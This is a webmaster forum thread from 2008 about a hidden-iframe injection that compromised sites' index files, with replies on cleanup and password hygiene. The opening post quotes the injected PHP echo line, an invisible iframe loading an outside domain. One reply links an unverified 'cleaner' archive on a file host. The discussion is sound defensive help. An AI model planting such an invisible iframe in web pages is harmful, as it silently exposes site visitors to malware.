1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

what is this echo "<iframe src=\"http://thedeadpit.com/?click=4859468

Discussion in 'Search Engine Optimization' started by unna, Dec 15, 2008.

  1. #1
    echo "<iframe src=\"http://thedeadpit.com/?click=4859468\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

    a script is coming in my site as echo "<iframe src=\"http://thedeadpit.com/?click=4859468

    i want to know what is this??
     
    unna, Dec 15, 2008 IP
  2. DrivingTraffic.com

    DrivingTraffic.com Peon

    Messages:
    68
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #2
    PHP code... where is this located? you could probably delete that whole line and have no issues.
     
    DrivingTraffic.com, Dec 15, 2008 IP
  3. WallerBlog

    WallerBlog Peon

    Messages:
    157
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    0
    #3
    What do you mean a script is coming in your site?
     
    WallerBlog, Dec 15, 2008 IP
  4. unna

    unna Well-Known Member

    Messages:
    3,274
    Likes Received:
    43
    Best Answers:
    0
    Trophy Points:
    140
    #4
    this script is automatically installed on all pages..
     
    unna, Dec 16, 2008 IP
  5. anikz

    anikz Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #5
    I can't find the file where this tag is written. Can anyone please tell, on which file, will I get the line to delete?
     
    anikz, Dec 16, 2008 IP
  6. unna

    unna Well-Known Member

    Messages:
    3,274
    Likes Received:
    43
    Best Answers:
    0
    Trophy Points:
    140
    #6
    do u also recieving this code on your site?
     
    unna, Dec 16, 2008 IP
  7. anikz

    anikz Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #7
    Oh yes.......i've checked the footer.php file. Nothing is written there.......I'm so tensed
     
    anikz, Dec 16, 2008 IP
  8. unna

    unna Well-Known Member

    Messages:
    3,274
    Likes Received:
    43
    Best Answers:
    0
    Trophy Points:
    140
    #8
    download your footer and then check....

    it is not in your local..

    some one had hacked your site....

    download file first and then delete this tag and upload...

    and put strong password if you have installed any scripts like wordpress, joomla or any other
     
    unna, Dec 16, 2008 IP
  9. anikz

    anikz Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #9
    It attacks all the "index" files in server. I've recovered my wordpress blog but I got tired in clearing my forum files.........Oh....
     
    anikz, Dec 17, 2008 IP
  10. anikz

    anikz Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #10
    I've found it. This hacker has added an ifame tag at the end of each "index" file. It is so tough for a human being to add this tagline to 25/26 "index" files which are not in a place manually. Most probably he has run a bot. How can I stop him? I cleared all the files in my blog, but in the afternoon, I found them hacked again. How can I stop this? Can anyone please help?
     
    anikz, Dec 17, 2008 IP
  11. unna

    unna Well-Known Member

    Messages:
    3,274
    Likes Received:
    43
    Best Answers:
    0
    Trophy Points:
    140
    #11
    ask with your web hosting company to put strong password...

    never installed WP or any other free CMS from fantisco
     
    unna, Dec 17, 2008 IP
  12. ezprint2008

    ezprint2008 Well-Known Member

    Messages:
    611
    Likes Received:
    15
    Best Answers:
    2
    Trophy Points:
    140
    Digital Goods:
    1
    #12
    that is a frame code, an Iframe thats invisible on your site, but is being opened as part of your page. To do that, its also calling the deadpit site. It makes some of your traffic also show up on theirs etc.
    To do that they have to be editing and uploading your index files to your server. Email or call your server or hire webmaster to shutdown the ability to upload / or FTP to your server etc.

    are your folders protected that are on your server?
    an example would be like yourdomain.com/folder1/index.php
    if someone can put in yourdomain.com/folder1/ (and if it isnt blocked in permissions) it will show the files i nyour folder in basically raw file form. If somebody wanted to see your information on your index files. So say somebody comes to your site and they type in yourdomain.com/folder1/ ..and it shows up displaying everything in that folder INCLUDING your database or SQL connect files. If your SQL database password and username are in those folders , they can see that too. That makes it very easy.. because then they just use your username and password to access your database, and they are inside your server with an FTP upload program and they change whatever they want if your security is that loose.

    So try this:
    1. Check the permissions on all your folders at your server. Make sure they are protected.
    2. If they havent been protected then change your passwords to EVERYTHING on your site , including database etc, and also set permissions to block unauthorized access to folders.
    3. Never keep your server passwords on your server in a .txt file etc

    Hackers will look for any code, folder, script ..anything that can get them inside your site or database. Once in, they will probably upload programs that will ping other sites to give traffic, or links etc.
    You're somewhat lucky, because it sounds like whoever hacked into your site and put Iframes, is a complete doofus. Another simple tip is, never post your real file or folder names to forums. Sometimes when you see people saying something like = "I dont know whats wrong with me code but heres the error I'm getting 'Error Can't find file in yoursite.com/DatabaseCon/users/somethingsomethin.php"

    Somebody else sees that and goes to your site by using this URL: yoursite.com/DatabaseCon/ and yoursite.com/DatabaseCon/users/ just to see if they can get in.

    Sometimes if you have a website made by a web design company, its good to have somebody look through it afterward, because they will sometimes put code, scripts, links etc. I've found stuff in sites before that went as far as putting clone email to send the web designers a copy of every email that went to various sites they created. Crazy and dirty.
     
    ezprint2008, Dec 17, 2008 IP
    MattUK likes this.
  13. GTNet

    GTNet Peon

    Messages:
    65
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #13
    I was shocked when i found this thread " HTML:Iframe.inf " from mydeadpit.com ...in my all websites hosted on BlueHost. Avast antivirus was blocking all my websites and I was just clueless... what to do? I was unable to look at my own websites on my computer.
    All index files were infected and showing at the bottom this thread.
    MANY THANKS TO DP FORUM and special thanks to "EZPRINTS2008" to explain all the steps very nicely. So that I removed the thread one by one from all of my websites (mostly on WordPress platform) and took all possible steps to avoid such incident in the future.
    Still I need know MORE precautions to be taken, from experienced web masters to avoid such viruses and spywares.
    ....thanks again.
     
    GTNet, Dec 18, 2008 IP
  14. egexa

    egexa Active Member

    Messages:
    14
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    86
    #14
    I developed a script which remove that code from your pages

    http://rapidshare.com/files/178001564/clean_viruses_egexa.com.rar

    extract it and follow the instructions in help.txt
    It'll search every page of your site for that virus code and remove it.
    script developed by http://egexa.com
     
    egexa, Dec 29, 2008 IP
  15. Pacific Publishing

    Pacific Publishing Banned

    Messages:
    330
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #15
    Also contact your host and have them scan the server from their end. Then change your FTP passwords.
     
    Pacific Publishing, Jan 2, 2009 IP
  16. seodilip

    seodilip Active Member

    Messages:
    697
    Likes Received:
    9
    Best Answers:
    0
    Trophy Points:
    58
    #16
    such scripts might be the scripts created for the hacking of the webistes......e.g. the iframe script containing url http://traffurl.ru

    It is generally observed by many webmasters that, automated software logged-in using your programmer's ftp username, downloaded a file, added malicious content and uploaded.

    People who are going to the hacked website might be inadvertently downloading a trojan horse or something similar onto their machines, because of the iframe that is sending them to traffurl in an invisible frame (display: none).

    An insecure web form on your site is the might be the reason behind that, although the new module "might" be as well.

    While you are working on cleaning up the mess, change your passwords for everything as well (including x-cart admins). Also, notify your web host of the hack.
     
    seodilip, Jan 3, 2009 IP
  17. kartik786

    kartik786 Well-Known Member

    Messages:
    1,904
    Likes Received:
    60
    Best Answers:
    0
    Trophy Points:
    170
    #17
    i'm getting the same error on Online MBA . Can someone help with the solution to this?
     
    kartik786, Jan 29, 2009 IP
  18. unna

    unna Well-Known Member

    Messages:
    3,274
    Likes Received:
    43
    Best Answers:
    0
    Trophy Points:
    140
    #18
    website is not opening....

    fix it first..
     
    unna, Jan 30, 2009 IP
  19. kartik786

    kartik786 Well-Known Member

    Messages:
    1,904
    Likes Received:
    60
    Best Answers:
    0
    Trophy Points:
    170
    #19
    Website opens up just fine. Online MBA but when you open it you get avast antivirus giving a iframe alert.
     
    kartik786, Jan 30, 2009 IP
  20. shubhangid

    shubhangid Peon

    Messages:
    128
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #20
    hello all,

    How i get to know that script is added.?do i have to check all the time?or some error comes while accesing the page?
     
    shubhangid, Feb 3, 2009 IP